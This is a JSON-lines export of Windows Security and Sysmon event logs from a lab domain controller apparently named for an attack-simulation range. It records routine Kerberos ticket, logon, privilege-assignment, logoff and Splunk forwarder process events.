{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220669,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{F0F909A7-1C6D-5D35-3A3A-4067C583B2E2}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{F0F909A7-1C6D-5D35-3A3A-4067C583B2E2}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220670,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{F0F909A7-1C6D-5D35-3A3A-4067C583B2E2}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{F0F909A7-1C6D-5D35-3A3A-4067C583B2E2}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220671,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xAC157\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{F0F909A7-1C6D-5D35-3A3A-4067C583B2E2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xac157","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{F0F909A7-1C6D-5D35-3A3A-4067C583B2E2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220672,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xAC157\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xac157","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5663,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.906\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.906","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5664,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.906\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.906","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220673,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA5587\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa5587","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220674,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA52CE\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa52ce","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220675,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xAC157\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xac157","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5665,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:50.908\r\nProcessGuid: {A837DB8D-0332-5F25-0000-001061C20A00}\r\nProcessId: 3068\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:50.908","ProcessGuid":"{A837DB8D-0332-5F25-0000-001061C20A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5666,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:50.906\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0332-5F25-0000-001061C20A00}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:50.906","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0332-5F25-0000-001061C20A00}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
